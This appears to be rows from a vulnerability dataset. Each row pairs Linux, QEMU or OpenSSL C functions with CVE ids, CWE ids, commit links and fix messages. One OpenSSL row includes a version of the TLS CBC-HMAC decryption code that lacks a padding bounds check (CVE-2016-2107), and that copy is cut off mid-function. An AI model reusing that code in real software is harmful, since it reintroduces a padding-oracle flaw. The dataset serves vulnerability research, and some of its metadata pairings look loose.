static struct kvm_vcpu *svm_create_vcpu(struct kvm *kvm, unsigned int id) { struct vcpu_svm *svm; struct page *page; struct page *msrpm_pages; struct page *hsave_page; struct page *nested_msrpm_pages; int err; svm = kmem_cache_zalloc(kvm_vcpu_cache, GFP_KERNEL); if (!svm) { err = -ENOMEM; goto out; } svm->tsc_ratio = TSC_RATIO_DEFAULT; err = kvm_vcpu_init(&svm->vcpu, kvm, id); if (err) goto free_svm; err = -ENOMEM; page = alloc_page(GFP_KERNEL); if (!page) goto uninit; msrpm_pages = alloc_pages(GFP_KERNEL, MSRPM_ALLOC_ORDER); if (!msrpm_pages) goto free_page1; nested_msrpm_pages = alloc_pages(GFP_KERNEL, MSRPM_ALLOC_ORDER); if (!nested_msrpm_pages) goto free_page2; hsave_page = alloc_page(GFP_KERNEL); if (!hsave_page) goto free_page3; svm->nested.hsave = page_address(hsave_page); svm->msrpm = page_address(msrpm_pages); svm_vcpu_init_msrpm(svm->msrpm); svm->nested.msrpm = page_address(nested_msrpm_pages); svm_vcpu_init_msrpm(svm->nested.msrpm); svm->vmcb = page_address(page); clear_page(svm->vmcb); svm->vmcb_pa = page_to_pfn(page) << PAGE_SHIFT; svm->asid_generation = 0; init_vmcb(svm); svm->vcpu.arch.apic_base = APIC_DEFAULT_PHYS_BASE | MSR_IA32_APICBASE_ENABLE; if (kvm_vcpu_is_bsp(&svm->vcpu)) svm->vcpu.arch.apic_base |= MSR_IA32_APICBASE_BSP; svm_init_osvw(&svm->vcpu); return &svm->vcpu; free_page3: __free_pages(nested_msrpm_pages, MSRPM_ALLOC_ORDER); free_page2: __free_pages(msrpm_pages, MSRPM_ALLOC_ORDER); free_page1: __free_page(page); uninit: kvm_vcpu_uninit(&svm->vcpu); free_svm: kmem_cache_free(kvm_vcpu_cache, svm); out: return ERR_PTR(err); }
static struct kvm_vcpu *svm_create_vcpu(struct kvm *kvm, unsigned int id) { struct vcpu_svm *svm; struct page *page; struct page *msrpm_pages; struct page *hsave_page; struct page *nested_msrpm_pages; int err; svm = kmem_cache_zalloc(kvm_vcpu_cache, GFP_KERNEL); if (!svm) { err = -ENOMEM; goto out; } svm->tsc_ratio = TSC_RATIO_DEFAULT; err = kvm_vcpu_init(&svm->vcpu, kvm, id); if (err) goto free_svm; err = -ENOMEM; page = alloc_page(GFP_KERNEL); if (!page) goto uninit; msrpm_pages = alloc_pages(GFP_KERNEL, MSRPM_ALLOC_ORDER); if (!msrpm_pages) goto free_page1; nested_msrpm_pages = alloc_pages(GFP_KERNEL, MSRPM_ALLOC_ORDER); if (!nested_msrpm_pages) goto free_page2; hsave_page = alloc_page(GFP_KERNEL); if (!hsave_page) goto free_page3; svm->nested.hsave = page_address(hsave_page); svm->msrpm = page_address(msrpm_pages); svm_vcpu_init_msrpm(svm->msrpm); svm->nested.msrpm = page_address(nested_msrpm_pages); svm_vcpu_init_msrpm(svm->nested.msrpm); svm->vmcb = page_address(page); clear_page(svm->vmcb); svm->vmcb_pa = page_to_pfn(page) << PAGE_SHIFT; svm->asid_generation = 0; init_vmcb(svm); svm->vcpu.arch.apic_base = APIC_DEFAULT_PHYS_BASE | MSR_IA32_APICBASE_ENABLE; if (kvm_vcpu_is_bsp(&svm->vcpu)) svm->vcpu.arch.apic_base |= MSR_IA32_APICBASE_BSP; svm_init_osvw(&svm->vcpu); return &svm->vcpu; free_page3: __free_pages(nested_msrpm_pages, MSRPM_ALLOC_ORDER); free_page2: __free_pages(msrpm_pages, MSRPM_ALLOC_ORDER); free_page1: __free_page(page); uninit: kvm_vcpu_uninit(&svm->vcpu); free_svm: kmem_cache_free(kvm_vcpu_cache, svm); out: return ERR_PTR(err); }
C
linux
0
CVE-2017-7645
https://www.cvedetails.com/cve/CVE-2017-7645/
CWE-20
https://github.com/torvalds/linux/commit/e6838a29ecb484c97e4efef9429643b9851fba6e
e6838a29ecb484c97e4efef9429643b9851fba6e
nfsd: check for oversized NFSv2/v3 arguments A client can append random data to the end of an NFSv2 or NFSv3 RPC call without our complaining; we'll just stop parsing at the end of the expected data and ignore the rest. Encoded arguments and replies are stored together in an array of pages, and if a call is too large it could leave inadequate space for the reply. This is normally OK because NFS RPC's typically have either short arguments and long replies (like READ) or long arguments and short replies (like WRITE). But a client that sends an incorrectly long reply can violate those assumptions. This was observed to cause crashes. Also, several operations increment rq_next_page in the decode routine before checking the argument size, which can leave rq_next_page pointing well past the end of the page array, causing trouble later in svc_free_pages. So, following a suggestion from Neil Brown, add a central check to enforce our expectation that no NFSv2/v3 call has both a large call and a large reply. As followup we may also want to rewrite the encoding routines to check more carefully that they aren't running off the end of the page array. We may also consider rejecting calls that have any extra garbage appended. That would be safer, and within our rights by spec, but given the age of our server and the NFS protocol, and the fact that we've never enforced this before, we may need to balance that against the possibility of breaking some oddball client. Reported-by: Tuomas Haanpää <[email protected]> Reported-by: Ari Kauppi <[email protected]> Cc: [email protected] Reviewed-by: NeilBrown <[email protected]> Signed-off-by: J. Bruce Fields <[email protected]>
static void set_max_drc(void) { #define NFSD_DRC_SIZE_SHIFT 10 nfsd_drc_max_mem = (nr_free_buffer_pages() >> NFSD_DRC_SIZE_SHIFT) * PAGE_SIZE; nfsd_drc_mem_used = 0; spin_lock_init(&nfsd_drc_lock); dprintk("%s nfsd_drc_max_mem %lu \n", __func__, nfsd_drc_max_mem); }
static void set_max_drc(void) { #define NFSD_DRC_SIZE_SHIFT 10 nfsd_drc_max_mem = (nr_free_buffer_pages() >> NFSD_DRC_SIZE_SHIFT) * PAGE_SIZE; nfsd_drc_mem_used = 0; spin_lock_init(&nfsd_drc_lock); dprintk("%s nfsd_drc_max_mem %lu \n", __func__, nfsd_drc_max_mem); }
C
linux
0
CVE-2016-9913
https://www.cvedetails.com/cve/CVE-2016-9913/
CWE-400
https://git.qemu.org/?p=qemu.git;a=commit;h=4774718e5c194026ba5ee7a28d9be49be3080e42
4774718e5c194026ba5ee7a28d9be49be3080e42
null
static void coroutine_fn v9fs_version(void *opaque) { ssize_t err; V9fsPDU *pdu = opaque; V9fsState *s = pdu->s; V9fsString version; size_t offset = 7; v9fs_string_init(&version); err = pdu_unmarshal(pdu, offset, "ds", &s->msize, &version); if (err < 0) { offset = err; goto out; } trace_v9fs_version(pdu->tag, pdu->id, s->msize, version.data); virtfs_reset(pdu); if (!strcmp(version.data, "9P2000.u")) { s->proto_version = V9FS_PROTO_2000U; } else if (!strcmp(version.data, "9P2000.L")) { s->proto_version = V9FS_PROTO_2000L; } else { v9fs_string_sprintf(&version, "unknown"); } err = pdu_marshal(pdu, offset, "ds", s->msize, &version); if (err < 0) { offset = err; goto out; } offset += err; trace_v9fs_version_return(pdu->tag, pdu->id, s->msize, version.data); out: pdu_complete(pdu, offset); v9fs_string_free(&version); }
static void coroutine_fn v9fs_version(void *opaque) { ssize_t err; V9fsPDU *pdu = opaque; V9fsState *s = pdu->s; V9fsString version; size_t offset = 7; v9fs_string_init(&version); err = pdu_unmarshal(pdu, offset, "ds", &s->msize, &version); if (err < 0) { offset = err; goto out; } trace_v9fs_version(pdu->tag, pdu->id, s->msize, version.data); virtfs_reset(pdu); if (!strcmp(version.data, "9P2000.u")) { s->proto_version = V9FS_PROTO_2000U; } else if (!strcmp(version.data, "9P2000.L")) { s->proto_version = V9FS_PROTO_2000L; } else { v9fs_string_sprintf(&version, "unknown"); } err = pdu_marshal(pdu, offset, "ds", s->msize, &version); if (err < 0) { offset = err; goto out; } offset += err; trace_v9fs_version_return(pdu->tag, pdu->id, s->msize, version.data); out: pdu_complete(pdu, offset); v9fs_string_free(&version); }
C
qemu
0
CVE-2014-3688
https://www.cvedetails.com/cve/CVE-2014-3688/
CWE-399
https://github.com/torvalds/linux/commit/26b87c7881006311828bb0ab271a551a62dcceb4
26b87c7881006311828bb0ab271a551a62dcceb4
net: sctp: fix remote memory pressure from excessive queueing This scenario is not limited to ASCONF, just taken as one example triggering the issue. When receiving ASCONF probes in the form of ... -------------- INIT[ASCONF; ASCONF_ACK] -------------> <----------- INIT-ACK[ASCONF; ASCONF_ACK] ------------ -------------------- COOKIE-ECHO --------------------> <-------------------- COOKIE-ACK --------------------- ---- ASCONF_a; [ASCONF_b; ...; ASCONF_n;] JUNK ------> [...] ---- ASCONF_m; [ASCONF_o; ...; ASCONF_z;] JUNK ------> ... where ASCONF_a, ASCONF_b, ..., ASCONF_z are good-formed ASCONFs and have increasing serial numbers, we process such ASCONF chunk(s) marked with !end_of_packet and !singleton, since we have not yet reached the SCTP packet end. SCTP does only do verification on a chunk by chunk basis, as an SCTP packet is nothing more than just a container of a stream of chunks which it eats up one by one. We could run into the case that we receive a packet with a malformed tail, above marked as trailing JUNK. All previous chunks are here goodformed, so the stack will eat up all previous chunks up to this point. In case JUNK does not fit into a chunk header and there are no more other chunks in the input queue, or in case JUNK contains a garbage chunk header, but the encoded chunk length would exceed the skb tail, or we came here from an entirely different scenario and the chunk has pdiscard=1 mark (without having had a flush point), it will happen, that we will excessively queue up the association's output queue (a correct final chunk may then turn it into a response flood when flushing the queue ;)): I ran a simple script with incremental ASCONF serial numbers and could see the server side consuming excessive amount of RAM [before/after: up to 2GB and more]. The issue at heart is that the chunk train basically ends with !end_of_packet and !singleton markers and since commit 2e3216cd54b1 ("sctp: Follow security requirement of responding with 1 packet") therefore preventing an output queue flush point in sctp_do_sm() -> sctp_cmd_interpreter() on the input chunk (chunk = event_arg) even though local_cork is set, but its precedence has changed since then. In the normal case, the last chunk with end_of_packet=1 would trigger the queue flush to accommodate possible outgoing bundling. In the input queue, sctp_inq_pop() seems to do the right thing in terms of discarding invalid chunks. So, above JUNK will not enter the state machine and instead be released and exit the sctp_assoc_bh_rcv() chunk processing loop. It's simply the flush point being missing at loop exit. Adding a try-flush approach on the output queue might not work as the underlying infrastructure might be long gone at this point due to the side-effect interpreter run. One possibility, albeit a bit of a kludge, would be to defer invalid chunk freeing into the state machine in order to possibly trigger packet discards and thus indirectly a queue flush on error. It would surely be better to discard chunks as in the current, perhaps better controlled environment, but going back and forth, it's simply architecturally not possible. I tried various trailing JUNK attack cases and it seems to look good now. Joint work with Vlad Yasevich. Fixes: 2e3216cd54b1 ("sctp: Follow security requirement of responding with 1 packet") Signed-off-by: Daniel Borkmann <[email protected]> Signed-off-by: Vlad Yasevich <[email protected]> Signed-off-by: David S. Miller <[email protected]>
sctp_disposition_t sctp_sf_timer_ignore(struct net *net, const struct sctp_endpoint *ep, const struct sctp_association *asoc, const sctp_subtype_t type, void *arg, sctp_cmd_seq_t *commands) { pr_debug("%s: timer %d ignored\n", __func__, type.chunk); return SCTP_DISPOSITION_CONSUME; }
sctp_disposition_t sctp_sf_timer_ignore(struct net *net, const struct sctp_endpoint *ep, const struct sctp_association *asoc, const sctp_subtype_t type, void *arg, sctp_cmd_seq_t *commands) { pr_debug("%s: timer %d ignored\n", __func__, type.chunk); return SCTP_DISPOSITION_CONSUME; }
C
linux
0
CVE-2016-2107
https://www.cvedetails.com/cve/CVE-2016-2107/
CWE-310
https://git.openssl.org/?p=openssl.git;a=commit;h=68595c0c2886e7942a14f98c17a55a88afb6c292
68595c0c2886e7942a14f98c17a55a88afb6c292
null
static int aesni_cbc_hmac_sha256_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out, const unsigned char *in, size_t len) { EVP_AES_HMAC_SHA256 *key = data(ctx); unsigned int l; size_t plen = key->payload_length, iv = 0, /* explicit IV in TLS 1.1 and * later */ sha_off = 0; # if defined(STITCHED_CALL) size_t aes_off = 0, blocks; sha_off = SHA256_CBLOCK - key->md.num; # endif key->payload_length = NO_PAYLOAD_LENGTH; if (len % AES_BLOCK_SIZE) return 0; if (ctx->encrypt) { if (plen == NO_PAYLOAD_LENGTH) plen = len; else if (len != ((plen + SHA256_DIGEST_LENGTH + AES_BLOCK_SIZE) & -AES_BLOCK_SIZE)) return 0; else if (key->aux.tls_ver >= TLS1_1_VERSION) iv = AES_BLOCK_SIZE; # if defined(STITCHED_CALL) /* * Assembly stitch handles AVX-capable processors, but its * performance is not optimal on AMD Jaguar, ~40% worse, for * unknown reasons. Incidentally processor in question supports * AVX, but not AMD-specific XOP extension, which can be used * to identify it and avoid stitch invocation. So that after we * establish that current CPU supports AVX, we even see if it's * either even XOP-capable Bulldozer-based or GenuineIntel one. */ if (OPENSSL_ia32cap_P[1] & (1 << (60 - 32)) && /* AVX? */ ((OPENSSL_ia32cap_P[1] & (1 << (43 - 32))) /* XOP? */ | (OPENSSL_ia32cap_P[0] & (1<<30))) && /* "Intel CPU"? */ plen > (sha_off + iv) && (blocks = (plen - (sha_off + iv)) / SHA256_CBLOCK)) { SHA256_Update(&key->md, in + iv, sha_off); (void)aesni_cbc_sha256_enc(in, out, blocks, &key->ks, ctx->iv, &key->md, in + iv + sha_off); blocks *= SHA256_CBLOCK; aes_off += blocks; sha_off += blocks; key->md.Nh += blocks >> 29; key->md.Nl += blocks <<= 3; if (key->md.Nl < (unsigned int)blocks) key->md.Nh++; } else { sha_off = 0; } # endif sha_off += iv; SHA256_Update(&key->md, in + sha_off, plen - sha_off); if (plen != len) { /* "TLS" mode of operation */ if (in != out) memcpy(out + aes_off, in + aes_off, plen - aes_off); /* calculate HMAC and append it to payload */ SHA256_Final(out + plen, &key->md); key->md = key->tail; SHA256_Update(&key->md, out + plen, SHA256_DIGEST_LENGTH); SHA256_Final(out + plen, &key->md); /* pad the payload|hmac */ plen += SHA256_DIGEST_LENGTH; for (l = len - plen - 1; plen < len; plen++) out[plen] = l; /* encrypt HMAC|padding at once */ aesni_cbc_encrypt(out + aes_off, out + aes_off, len - aes_off, &key->ks, ctx->iv, 1); } else { aesni_cbc_encrypt(in + aes_off, out + aes_off, len - aes_off, &key->ks, ctx->iv, 1); } } else { union { unsigned int u[SHA256_DIGEST_LENGTH / sizeof(unsigned int)]; unsigned char c[64 + SHA256_DIGEST_LENGTH]; } mac, *pmac; /* arrange cache line alignment */ pmac = (void *)(((size_t)mac.c + 63) & ((size_t)0 - 64)); /* decrypt HMAC|padding at once */ aesni_cbc_encrypt(in, out, len, &key->ks, ctx->iv, 0); if (plen != NO_PAYLOAD_LENGTH) { /* "TLS" mode of operation */ size_t inp_len, mask, j, i; unsigned int res, maxpad, pad, bitlen; int ret = 1; union { unsigned int u[SHA_LBLOCK]; unsigned char c[SHA256_CBLOCK]; } *data = (void *)key->md.data; if ((key->aux.tls_aad[plen - 4] << 8 | key->aux.tls_aad[plen - 3]) >= TLS1_1_VERSION) iv = AES_BLOCK_SIZE; if (len < (iv + SHA256_DIGEST_LENGTH + 1)) return 0; /* omit explicit iv */ out += iv; len -= iv; /* figure out payload length */ pad = out[len - 1]; maxpad = len - (SHA256_DIGEST_LENGTH + 1); maxpad |= (255 - maxpad) >> (sizeof(maxpad) * 8 - 8); maxpad |= (255 - maxpad) >> (sizeof(maxpad) * 8 - 8); maxpad &= 255; ret &= constant_time_ge(maxpad, pad); inp_len = len - (SHA256_DIGEST_LENGTH + pad + 1); mask = (0 - ((inp_len - len) >> (sizeof(inp_len) * 8 - 1))); inp_len &= mask; key->aux.tls_aad[plen - 1] = inp_len; /* calculate HMAC */ key->md = key->head; SHA256_Update(&key->md, key->aux.tls_aad, plen); # if 1 len -= SHA256_DIGEST_LENGTH; /* amend mac */ if (len >= (256 + SHA256_CBLOCK)) { j = (len - (256 + SHA256_CBLOCK)) & (0 - SHA256_CBLOCK); j += SHA256_CBLOCK - key->md.num; SHA256_Update(&key->md, out, j); out += j; len -= j; inp_len -= j; } /* but pretend as if we hashed padded payload */ bitlen = key->md.Nl + (inp_len << 3); /* at most 18 bits */ # ifdef BSWAP4 bitlen = BSWAP4(bitlen); # else mac.c[0] = 0; mac.c[1] = (unsigned char)(bitlen >> 16); mac.c[2] = (unsigned char)(bitlen >> 8); mac.c[3] = (unsigned char)bitlen; bitlen = mac.u[0]; # endif pmac->u[0] = 0; pmac->u[1] = 0; pmac->u[2] = 0; pmac->u[3] = 0; pmac->u[4] = 0; pmac->u[5] = 0; pmac->u[6] = 0; pmac->u[7] = 0; for (res = key->md.num, j = 0; j < len; j++) { size_t c = out[j]; mask = (j - inp_len) >> (sizeof(j) * 8 - 8); c &= mask; c |= 0x80 & ~mask & ~((inp_len - j) >> (sizeof(j) * 8 - 8)); data->c[res++] = (unsigned char)c; if (res != SHA256_CBLOCK) continue; /* j is not incremented yet */ mask = 0 - ((inp_len + 7 - j) >> (sizeof(j) * 8 - 1)); data->u[SHA_LBLOCK - 1] |= bitlen & mask; sha256_block_data_order(&key->md, data, 1); mask &= 0 - ((j - inp_len - 72) >> (sizeof(j) * 8 - 1)); pmac->u[0] |= key->md.h[0] & mask; pmac->u[1] |= key->md.h[1] & mask; pmac->u[2] |= key->md.h[2] & mask; pmac->u[3] |= key->md.h[3] & mask; pmac->u[4] |= key->md.h[4] & mask; pmac->u[5] |= key->md.h[5] & mask; pmac->u[6] |= key->md.h[6] & mask; pmac->u[7] |= key->md.h[7] & mask; res = 0; } for (i = res; i < SHA256_CBLOCK; i++, j++) data->c[i] = 0; if (res > SHA256_CBLOCK - 8) { mask = 0 - ((inp_len + 8 - j) >> (sizeof(j) * 8 - 1)); data->u[SHA_LBLOCK - 1] |= bitlen & mask; sha256_block_data_order(&key->md, data, 1); mask &= 0 - ((j - inp_len - 73) >> (sizeof(j) * 8 - 1)); pmac->u[0] |= key->md.h[0] & mask; pmac->u[1] |= key->md.h[1] & mask; pmac->u[2] |= key->md.h[2] & mask; pmac->u[3] |= key->md.h[3] & mask; pmac->u[4] |= key->md.h[4] & mask; pmac->u[5] |= key->md.h[5] & mask; pmac->u[6] |= key->md.h[6] & mask; pmac->u[7] |= key->md.h[7] & mask; memset(data, 0, SHA256_CBLOCK); j += 64; } data->u[SHA_LBLOCK - 1] = bitlen; sha256_block_data_order(&key->md, data, 1); mask = 0 - ((j - inp_len - 73) >> (sizeof(j) * 8 - 1)); pmac->u[0] |= key->md.h[0] & mask; pmac->u[1] |= key->md.h[1] & mask; pmac->u[2] |= key->md.h[2] & mask; pmac->u[3] |= key->md.h[3] & mask; pmac->u[4] |= key->md.h[4] & mask; pmac->u[5] |= key->md.h[5] & mask; pmac->u[6] |= key->md.h[6] & mask; pmac->u[7] |= key->md.h[7] & mask; # ifdef BSWAP4 pmac->u[0] = BSWAP4(pmac->u[0]); pmac->u[1] = BSWAP4(pmac->u[1]); pmac->u[2] = BSWAP4(pmac->u[2]); pmac->u[3] = BSWAP4(pmac->u[3]); pmac->u[4] = BSWAP4(pmac->u[4]); pmac->u[5] = BSWAP4(pmac->u[5]); pmac->u[6] = BSWAP4(pmac->u[6]); pmac->u[7] = BSWAP4(pmac->u[7]); # else for (i = 0; i < 8; i++) { res = pmac->u[i]; pmac->c[4 * i + 0] = (unsigned char)(res >> 24); pmac->c[4 * i + 1] = (unsigned char)(res >> 16); pmac->c[4 * i + 2] = (unsigned char)(res >> 8); pmac->c[4 * i + 3] = (unsigned char)res; } # endif len += SHA256_DIGEST_LENGTH; # else SHA256_Update(&key->md, out, inp_len); res = key->md.num; SHA256_Final(pmac->c, &key->md); { unsigned int inp_blocks, pad_blocks; /* but pretend as if we hashed padded payload */ inp_blocks = 1 + ((SHA256_CBLOCK - 9 - res) >> (sizeof(res) * 8 - 1)); res += (unsigned int)(len - inp_len); pad_blocks = res / SHA256_CBLOCK; res %= SHA256_CBLOCK; pad_blocks += 1 + ((SHA256_CBLOCK - 9 - res) >> (sizeof(res) * 8 - 1)); for (; inp_blocks < pad_blocks; inp_blocks++) sha1_block_data_order(&key->md, data, 1); } # endif key->md = key->tail; SHA256_Update(&key->md, pmac->c, SHA256_DIGEST_LENGTH); SHA256_Final(pmac->c, &key->md); /* verify HMAC */ out += inp_len; len -= inp_len; # if 1 { unsigned char *p = out + len - 1 - maxpad - SHA256_DIGEST_LENGTH; size_t off = out - p; unsigned int c, cmask; maxpad += SHA256_DIGEST_LENGTH; for (res = 0, i = 0, j = 0; j < maxpad; j++) { c = p[j]; cmask = ((int)(j - off - SHA256_DIGEST_LENGTH)) >> (sizeof(int) * 8 - 1); res |= (c ^ pad) & ~cmask; /* ... and padding */ cmask &= ((int)(off - 1 - j)) >> (sizeof(int) * 8 - 1); res |= (c ^ pmac->c[i]) & cmask; i += 1 & cmask; } maxpad -= SHA256_DIGEST_LENGTH; res = 0 - ((0 - res) >> (sizeof(res) * 8 - 1)); ret &= (int)~res; } # else for (res = 0, i = 0; i < SHA256_DIGEST_LENGTH; i++) res |= out[i] ^ pmac->c[i]; res = 0 - ((0 - res) >> (sizeof(res) * 8 - 1)); ret &= (int)~res; /* verify padding */ pad = (pad & ~res) | (maxpad & res); out = out + len - 1 - pad; for (res = 0, i = 0; i < pad; i++) res |= out[i] ^ pad; res = (0 - res) >> (sizeof(res) * 8 - 1); ret &= (int)~res; # endif return ret; } else { SHA256_Update(&key->md, out, len); } } return 1; }
static int aesni_cbc_hmac_sha256_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out, const unsigned char *in, size_t len) { EVP_AES_HMAC_SHA256 *key = data(ctx); unsigned int l; size_t plen = key->payload_length, iv = 0, /* explicit IV in TLS 1.1 and * later */ sha_off = 0; # if defined(STITCHED_CALL) size_t aes_off = 0, blocks; sha_off = SHA256_CBLOCK - key->md.num; # endif key->payload_length = NO_PAYLOAD_LENGTH; if (len % AES_BLOCK_SIZE) return 0; if (ctx->encrypt) { if (plen == NO_PAYLOAD_LENGTH) plen = len; else if (len != ((plen + SHA256_DIGEST_LENGTH + AES_BLOCK_SIZE) & -AES_BLOCK_SIZE)) return 0; else if (key->aux.tls_ver >= TLS1_1_VERSION) iv = AES_BLOCK_SIZE; # if defined(STITCHED_CALL) /* * Assembly stitch handles AVX-capable processors, but its * performance is not optimal on AMD Jaguar, ~40% worse, for * unknown reasons. Incidentally processor in question supports * AVX, but not AMD-specific XOP extension, which can be used * to identify it and avoid stitch invocation. So that after we * establish that current CPU supports AVX, we even see if it's * either even XOP-capable Bulldozer-based or GenuineIntel one. */ if (OPENSSL_ia32cap_P[1] & (1 << (60 - 32)) && /* AVX? */ ((OPENSSL_ia32cap_P[1] & (1 << (43 - 32))) /* XOP? */ | (OPENSSL_ia32cap_P[0] & (1<<30))) && /* "Intel CPU"? */ plen > (sha_off + iv) && (blocks = (plen - (sha_off + iv)) / SHA256_CBLOCK)) { SHA256_Update(&key->md, in + iv, sha_off); (void)aesni_cbc_sha256_enc(in, out, blocks, &key->ks, ctx->iv, &key->md, in + iv + sha_off); blocks *= SHA256_CBLOCK; aes_off += blocks; sha_off += blocks; key->md.Nh += blocks >> 29; key->md.Nl += blocks <<= 3; if (key->md.Nl < (unsigned int)blocks) key->md.Nh++; } else { sha_off = 0; } # endif sha_off += iv; SHA256_Update(&key->md, in + sha_off, plen - sha_off); if (plen != len) { /* "TLS" mode of operation */ if (in != out) memcpy(out + aes_off, in + aes_off, plen - aes_off); /* calculate HMAC and append it to payload */ SHA256_Final(out + plen, &key->md); key->md = key->tail; SHA256_Update(&key->md, out + plen, SHA256_DIGEST_LENGTH); SHA256_Final(out + plen, &key->md); /* pad the payload|hmac */ plen += SHA256_DIGEST_LENGTH; for (l = len - plen - 1; plen < len; plen++) out[plen] = l; /* encrypt HMAC|padding at once */ aesni_cbc_encrypt(out + aes_off, out + aes_off, len - aes_off, &key->ks, ctx->iv, 1); } else { aesni_cbc_encrypt(in + aes_off, out + aes_off, len - aes_off, &key->ks, ctx->iv, 1); } } else { union { unsigned int u[SHA256_DIGEST_LENGTH / sizeof(unsigned int)]; unsigned char c[64 + SHA256_DIGEST_LENGTH]; } mac, *pmac; /* arrange cache line alignment */ pmac = (void *)(((size_t)mac.c + 63) & ((size_t)0 - 64)); /* decrypt HMAC|padding at once */ aesni_cbc_encrypt(in, out, len, &key->ks, ctx->iv, 0); if (plen != NO_PAYLOAD_LENGTH) { /* "TLS" mode of operation */ size_t inp_len, mask, j, i; unsigned int res, maxpad, pad, bitlen; int ret = 1; union { unsigned int u[SHA_LBLOCK]; unsigned char c[SHA256_CBLOCK]; } *data = (void *)key->md.data; if ((key->aux.tls_aad[plen - 4] << 8 | key->aux.tls_aad[plen - 3]) >= TLS1_1_VERSION) iv = AES_BLOCK_SIZE; if (len < (iv + SHA256_DIGEST_LENGTH + 1)) return 0; /* omit explicit iv */ out += iv; len -= iv; /* figure out payload length */ pad = out[len - 1]; maxpad = len - (SHA256_DIGEST_LENGTH + 1); maxpad |= (255 - maxpad) >> (sizeof(maxpad) * 8 - 8); maxpad |= (255 - maxpad) >> (sizeof(maxpad) * 8 - 8); maxpad &= 255; inp_len = len - (SHA256_DIGEST_LENGTH + pad + 1); mask = (0 - ((inp_len - len) >> (sizeof(inp_len) * 8 - 1))); inp_len &= mask; key->aux.tls_aad[plen - 1] = inp_len; /* calculate HMAC */ key->md = key->head; SHA256_Update(&key->md, key->aux.tls_aad, plen); # if 1 len -= SHA256_DIGEST_LENGTH; /* amend mac */ if (len >= (256 + SHA256_CBLOCK)) { j = (len - (256 + SHA256_CBLOCK)) & (0 - SHA256_CBLOCK); j += SHA256_CBLOCK - key->md.num; SHA256_Update(&key->md, out, j); out += j; len -= j; inp_len -= j; } /* but pretend as if we hashed padded payload */ bitlen = key->md.Nl + (inp_len << 3); /* at most 18 bits */ # ifdef BSWAP4 bitlen = BSWAP4(bitlen); # else mac.c[0] = 0; mac.c[1] = (unsigned char)(bitlen >> 16); mac.c[2] = (unsigned char)(bitlen >> 8); mac.c[3] = (unsigned char)bitlen; bitlen = mac.u[0]; # endif pmac->u[0] = 0; pmac->u[1] = 0; pmac->u[2] = 0; pmac->u[3] = 0; pmac->u[4] = 0; pmac->u[5] = 0; pmac->u[6] = 0; pmac->u[7] = 0; for (res = key->md.num, j = 0; j < len; j++) { size_t c = out[j]; mask = (j - inp_len) >> (sizeof(j) * 8 - 8); c &= mask; c |= 0x80 & ~mask & ~((inp_len - j) >> (sizeof(j) * 8 - 8)); data->c[res++] = (unsigned char)c; if (res != SHA256_CBLOCK) continue; /* j is not incremented yet */ mask = 0 - ((inp_len + 7 - j) >> (sizeof(j) * 8 - 1)); data->u[SHA_LBLOCK - 1] |= bitlen & mask; sha256_block_data_order(&key->md, data, 1); mask &= 0 - ((j - inp_len - 72) >> (sizeof(j) * 8 - 1)); pmac->u[0] |= key->md.h[0] & mask; pmac->u[1] |= key->md.h[1] & mask; pmac->u[2] |= key->md.h[2] & mask; pmac->u[3] |= key->md.h[3] & mask; pmac->u[4] |= key->md.h[4] & mask; pmac->u[5] |= key->md.h[5] & mask; pmac->u[6] |= key->md.h[6] & mask; pmac->u[7] |= key->md.h[7] & mask; res = 0; } for (i = res; i < SHA256_CBLOCK; i++, j++) data->c[i] = 0; if (res > SHA256_CBLOCK - 8) { mask = 0 - ((inp_len + 8 - j) >> (sizeof(j) * 8 - 1)); data->u[SHA_LBLOCK - 1] |= bitlen & mask; sha256_block_data_order(&key->md, data, 1); mask &= 0 - ((j - inp_len - 73) >> (sizeof(j) * 8 - 1)); pmac->u[0] |= key->md.h[0] & mask; pmac->u[1] |= key->md.h[1] & mask; pmac->u[2] |= key->md.h[2] & mask; pmac->u[3] |= key->md.h[3] & mask; pmac->u[4] |= key->md.h[4] & mask; pmac->u[5] |= key->md.h[5] & mask; pmac->u[6] |= key->md.h[6] & mask; pmac->u[7] |= key->md.h[7] & mask; memset(data, 0, SHA256_CBLOCK); j += 64; } data->u[SHA_LBLOCK - 1] = bitlen; sha256_block_data_order(&key->md, data, 1); mask = 0 - ((j - inp_len - 73) >> (sizeof(j) * 8 - 1)); pmac->u[0] |= key->md.h[0] & mask; pmac->u[1] |= key->md.h[1] & mask; pmac->u[2] |= key->md.h[2] & mask; pmac->u[3] |= key->md.h[3] & mask; pmac->u[4] |= key->md.h[4] & mask; pmac->u[5] |= key->md.h[5] & mask; pmac->u[6] |= key->md.h[6] & mask; pmac->u[7] |= key->md.h[7] & mask; # ifdef BSWAP4 pmac->u[0] = BSWAP4(pmac->u[0]); pmac->u[1] = BSWAP4(pmac->u[1]); pmac->u[2] = BSWAP4(pmac->u[2]); pmac->u[3] = BSWAP4(pmac->u[3]); pmac->u[4] = BSWAP4(pmac->u[4]); pmac->u[5] = BSWAP4(pmac->u[5]); pmac->u[6] = BSWAP4(pmac->u[6]); pmac->u[7] = BSWAP4(pmac->u[7]); # else for (i = 0; i < 8; i++) { res = pmac->u[i]; pmac->c[4 * i + 0] = (unsigned char)(res >> 24); pmac->c[4 * i + 1] = (unsigned char)(res >> 16); pmac->c[4 * i + 2] = (unsigned char)(res >> 8); pmac->c[4 * i + 3] = (unsigned char)res; } # endif len += SHA256_DIGEST_LENGTH; # else SHA256_Update(&key->md, out, inp_len); res = key->md.num; SHA256_Final(pmac->c, &key->md); { unsigned int inp_blocks, pad_blocks; /* but pretend as if we hashed padded payload */ inp_blocks = 1 + ((SHA256_CBLOCK - 9 - res) >> (sizeof(res) * 8 - 1)); res += (unsigned int)(len - inp_len); pad_blocks = res / SHA256_CBLOCK; res %= SHA256_CBLOCK; pad_blocks += 1 + ((SHA256_CBLOCK - 9 - res) >> (sizeof(res) * 8 - 1)); for (; inp_blocks < pad_blocks; inp_blocks++) sha1_block_data_order(&key->md, data, 1); } # endif key->md = key->tail; SHA256_Update(&key->md, pmac->c, SHA256_DIGEST_LENGTH); SHA256_Final(pmac->c, &key->md); /* verify HMAC */ out += inp_len; len -= inp_len; # if 1 { unsigned char *p = out + len - 1 - maxpad - SHA256_DIGEST_LENGTH; size_t off = out - p; unsigned int c, cmask; maxpad += SHA256_DIGEST_LENGTH; for (res = 0, i = 0, j = 0; j < maxpad; j++) { c = p[j]; cmask = ((int)(j - off - SHA256_DIGEST_LENGTH)) >> (sizeof(int) * 8 - 1); res |= 